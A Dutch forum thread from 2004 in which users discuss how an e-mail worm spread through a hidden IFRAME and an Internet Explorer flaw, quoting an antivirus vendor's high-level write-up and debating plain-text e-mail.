woensdag 24 maart 2004 12:24

Acties:

Verwijderd

Een exe-file in HEX; Dat doet me een beetje terugdenken naar mijn C64 tijd. Daarmee kon je ook gewoon in basic, via "Data" en "Poke" een machinetaal programmatje maken.

Ahh die simpele tijd . . .

donderdag 25 maart 2004 00:00

Acties:

Verwijderd

Gebruikten mensen maar plain-text e-mail

donderdag 25 maart 2004 00:03

Acties:

Verwijderd

Verwijderd schreef op 25 maart 2004 @ 00:00:
Gebruikten mensen maar plain-text e-mail

Dat staat natuurlijk los van het daadwerkelijke aanklikken van de mail.

Gelukkig is de hostende site offline en zal de malware zich niet veel verder meer verspreiden.

donderdag 25 maart 2004 00:07

Acties:

Verwijderd

Verwijderd schreef op 25 maart 2004 @ 00:03:
Dat staat natuurlijk los van het daadwerkelijke aanklikken van de mail.

Gelukkig is de hostende site offline en zal de malware zich niet veel verder meer verspreiden.

Dat heeft er wel mee te maken, er wordt een iframe gebruikt (html dus)

donderdag 25 maart 2004 00:12

Acties:

Verwijderd

Verwijderd schreef op 25 maart 2004 @ 00:07:
[...]

Dat heeft er wel mee te maken, er wordt een iframe gebruikt (html dus)

Plaintext + link klikken = geïnfecteerd.
Dus in dat opzicht maakt het niet uit zoals ik al zei.
Hoewel ik natuurlijk pro-plaintext ben.

Nog een extra quote ter ondersteuning.

The worm's distribution cycle starts from an e-mail. The e-mail contains a link to the "banner.htm" webpage on a webserver in the USA. This link can be automatically activated on certain e-mail clients because the worm uses the Iframe exploit in its e-mail message. So the worm doesn't send itself as an attachment, it sends a link with an exploit.

When the link is activated, the worm connects to the web site and executes the script. The script determines the version version of Internet Explorer. For versions 5.0, 5.5 and 6.0, the worm uses the Object data Remove Execution (MS03-032) vulnerability to run another script written with Visual Basic Script, "htmlhelp.cgi", from the same web site. This VBS script then drops the binary part as "Ieload.dll" to the Windows installation directory and executes it.

donderdag 25 maart 2004 00:18

Acties:

Verwijderd

Verwijderd schreef op 25 maart 2004 @ 00:12:
Plaintext + link klikken = geïnfecteerd.
Dus in dat opzicht maakt het niet uit zoals ik al zei.
Hoewel ik natuurlijk pro-plaintext ben.

Nog een extra quote ter ondersteuning.

[...]

Wel maf dat onze vriend Mr. Topicstarter het volgende zegt:

...een hidden IFRAME die naar...

donderdag 25 maart 2004 00:24

Acties:

Verwijderd

Verwijderd schreef op 25 maart 2004 @ 00:18:
[...]

Wel maf dat onze vriend Mr. Topicstarter het volgende zegt:

[...]

Zoals er ook in mijn quote staat, wordt er ook gebruikt gemaakt van een exploit in de mail zelf.
Lees de write-up van FSAV eens door, die geeft goede uitleg.